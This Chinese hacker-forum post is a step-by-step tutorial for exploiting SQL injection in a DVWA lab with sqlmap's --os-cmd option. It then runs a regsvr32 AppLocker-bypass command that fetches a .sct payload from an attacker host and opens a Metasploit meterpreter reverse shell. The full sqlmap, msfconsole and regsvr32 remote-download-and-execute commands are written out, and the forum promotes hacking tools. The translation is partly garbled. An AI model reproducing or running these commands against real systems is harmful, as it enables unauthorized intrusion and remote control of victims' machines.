在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

zevseo
11400zevseo大版主
2018-09-12 02:31:49
11400 2018-09-12 02:31:49
在本文中,我们将了解如何使用sqlmap执行命令注入,并尝试通过sqlmap执行任何cmd命令(如果Web服务器具有sql漏洞)。


需求

Xampp / Wamp服务器                                                                                                          
DVWA实验室
Kali Linux:Burp套件,sqlmap工具            
首先,您需要在XAMPP或WAMP服务器中安装DVWA实验室,请阅读此处的完整文章
现在打开电脑中的DVWA并使用以下凭据登录:
用户名  - admin
密码  - 密码
单击  DVWA Security  并将网站安全级别设置为  
从漏洞列表中选择SQL Injection进行攻击。 在文本框中键入  用户ID:1。不设置浏览器代理,请不要单击提交按钮。设置浏览器代理以使burp套件正常工作。  

描述:在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

图片:1 (2).png

在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

打开burp套件点击菜单栏中的代理 ,  然后  按下按钮。回来并点击   dvwa中的提交按钮。Burp诉讼将在获取的数据下提供“cookie”和“referrer”,稍后将在sqlmap命令中使用。

描述:在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

图片:2.png

在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

让我们使用sqlmap命令下的“refrere and cookies”枚举所有数据库名称。

sqlmap -u "https://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2" --dbs

描述:在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

图片:3.png

在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

请注意,下面给出的图像已经转储了数据库的所有名称。现在我们将选择dvwa进行命令注入攻击。

描述:在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

图片:4.png

在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

现在为metasploit框架和类型msfconsole打开另一个终端。
此模块简化了Regsvr32.exe应用程序白名单绕过技术。该模块创建一个托管.sct文件的Web服务器。当用户在系统上键入提供的regsvr32命令时,regsvr32将请求.sct文件,然后执行包含的PowerShell命令。然后,此命令下载并执行指定的有效负载(类似于带有PSH的web_delivery模块)。
两个Web请求(即.sct文件和PowerShell下载和执行)都可以在同一端口上发生。
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvport 5555
msf exploit(regsvr32_applocker_bypass_server) > exploit
以上模块将生成恶意代码作为dll文件。复制所选部分的dll文件,然后使用sqlmap命令运行此恶意代码

描述:在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

图片:6.png

在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

现在我们将使用sqlmap通过CMD命令执行dll文件,因此在sqlmap命令中粘贴恶意代码,如下图所示。
sqlmap -u "https://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" -cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2″ -D dvwa --os-cmd="regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll"

描述:在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

图片:7.png

在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

然后输入4( type 4作为php有效负载,输入1作为公共位置(common location,将有效负载上传为受害PC中的后门。

描述:在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

图片:8.png

在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

一旦命令执行回到metasploit框架,你就会打开meterpreter session 1。
输入会话-i 1
meterpreter>sysinfo

描述:在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

图片:9.png

在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

本文标题:在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2334.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan